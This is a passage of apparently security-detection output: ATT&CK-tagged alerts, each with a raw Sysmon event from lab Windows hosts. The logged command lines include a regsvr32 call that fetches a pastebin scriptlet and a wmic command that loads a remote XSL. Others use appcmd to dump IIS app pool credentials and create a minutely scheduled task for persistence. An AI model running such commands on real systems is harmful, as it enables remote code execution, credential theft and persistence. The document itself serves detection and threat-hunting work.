<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1558630145.862062,2019-05-23T20:49:05.862062+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\wbem\WMIC.exe ) through command line ( wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T16:49:05.736570Z"">
</TimeCreated>
<EventRecordID>892</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 16:49:05.686</Data>
<Data Name=""ProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
<Data Name=""ProcessId"">3872</Data>
<Data Name=""Image"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">WMI Commandline Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">c:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=4368DBD172224EC9461364BE1AC9DFFC5D9224A8,MD5=A03CF3838775E0801A0894C8BACD2E56,SHA256=132AA270790F56A7524CAB968927ED5E1D91B9A26D4BADCB24E450E7DECC5F81,IMPHASH=B59AF26B08AA14BA66272388BC9C2443</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CE84-5CE6-0000-001094130600</Data>
<Data Name=""ParentProcessId"">2940</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
</TimeCreated>
<EventRecordID>16793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
<Data Name=""ProcessId"">1912</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ParentProcessId"">1420</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557686106.562199,2019-05-12T22:35:06.562199+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-12T18:35:05.780949Z"">
</TimeCreated>
<EventRecordID>16793</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1880"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-12 18:35:05.765</Data>
<Data Name=""ProcessGuid"">365ABB72-6759-5CD8-0000-001085031000</Data>
<Data Name=""ProcessId"">1912</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-63FC-5CD8-0000-0020EE3E0100</Data>
<Data Name=""LogonId"">0x13eee</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-6759-5CD8-0000-0010E2D50F00</Data>
<Data Name=""ParentProcessId"">1420</Data>
<Data Name=""ParentImage"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""ParentCommandLine"">regsvr32.exe /u /s /i:http://pastebin.com/raw/H4A4iDTA scrobj.dll</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436008.250664,2019-07-30T01:33:28.250664+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:25.202819Z"">
</TimeCreated>
<EventRecordID>4915</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:24.152</Data>
<Data Name=""ProcessGuid"">747F3D96-6623-5D3F-0000-0010BC068800</Data>
<Data Name=""ProcessId"">3000</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49828</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1082] System Information Discovery,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,Critical,System Information Discovery Process ( C:\Windows\System32\whoami.exe) with commandline ( &quot;C:\Windows\system32\whoami.exe&quot; /user) ,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
</TimeCreated>
<EventRecordID>14</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
<Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
<Data Name=""ProcessId"">3576</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[ T0000 ] Suspicious process name detected,1555606624.681038,2019-04-18T20:57:04.681038+04:00,,Threat,High,User Name : ( IEWIN7\IEUser ) with Command Line : ( &quot;C:\Windows\system32\whoami.exe&quot; /user ) contains suspicious command ( whoami.exe),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:56:24.893827Z"">
</TimeCreated>
<EventRecordID>14</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""3288"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1033,technique_name=System Owner/User Discovery</Data>
<Data Name=""UtcTime"">2019-04-18 16:56:24.833</Data>
<Data Name=""ProcessGuid"">365ABB72-AC38-5CB8-0000-0010365E0800</Data>
<Data Name=""ProcessId"">3576</Data>
<Data Name=""Image"">C:\Windows\System32\whoami.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">whoami - displays logged on user information</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\whoami.exe&quot; /user</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-AB27-5CB8-0000-002021CA0000</Data>
<Data Name=""LogonId"">0xca21</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=DC058F52AD8ACBD316827B6DCAC2434AB3CC515C,MD5=0EBF71E33EF09CA65D9683AFA999C473,SHA256=599EFD455AEEEFE2044A9B597061F271595033F5D0DF2C99DFDBCA8394BBCEC3,IMPHASH=C5352B949915AB8CD5E1844790D19274</Data>
<Data Name=""ParentProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ParentProcessId"">1200</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">Powershell</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1053] Scheduled Task - Process,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\schtasks.exe ) through command line ( C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T15:12:59.578070Z"">
</TimeCreated>
<EventRecordID>6195</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""980"" ThreadID=""2220"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Persistence - Scheduled Task Management</Data>
<Data Name=""UtcTime"">2019-05-27 15:12:59.558</Data>
<Data Name=""ProcessGuid"">365ABB72-FE7B-5CEB-0000-0010D6820C00</Data>
<Data Name=""ProcessId"">4044</Data>
<Data Name=""Image"">C:\Windows\System32\schtasks.exe</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Manages scheduled tasks</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">C:\Windows\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-7B40-5CEC-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=8A7E8B05A122B768AB85466B2A3DAF7A358F90F4,MD5=2003E9B15E1C502B146DAD2E383AC1E3,SHA256=15018D0093BEFABBA8B927743191030D1F8C17BB97FDB48C2FC3EAB20E2D4B3D,IMPHASH=D92C80D49382091310FB8DB089F856A9</Data>
<Data Name=""ParentProcessGuid"">365ABB72-FE7B-5CEB-0000-0010867F0C00</Data>
<Data Name=""ParentProcessId"">4012</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">cmd.exe /c %SYSTEMROOT%\system32\schtasks.exe /create /sc minute /mo 1 /tn &quot;eyNQLDvUSuvVPg&quot; /tr &quot;\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy7\\Windows\Temp\svhost64.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.041809,2019-05-27T05:29:18.041809+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.041809Z"">
</TimeCreated>
<EventRecordID>5910</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.011</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C83FF00</Data>
<Data Name=""ProcessId"">2472</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Line Number: 0&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2020"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-11 17:58:50.075</Data>
<Data Name=""ProcessGuid"">365ABB72-0D5A-5CD7-0000-001069031700</Data>
<Data Name=""ProcessId"">2544</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">c:\Windows\System32\cmd.exe</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""LogonGuid"">365ABB72-8693-5CD7-0000-0020E7030000</Data>
<Data Name=""LogonId"">0x3e7</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">System</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-0D3F-5CD7-0000-00107F541600</Data>
<Data Name=""ParentProcessId"">3212</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -Embedding</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1557597534.762534,2019-05-11T21:58:54.762534+04:00,,Threat,High,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\Windows\System32\cmd.exe ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-11T17:58:50.090659Z"">
</TimeCreated>
<EventRecordID>16116</EventRecordID>
<Correlation>
</Correlation>
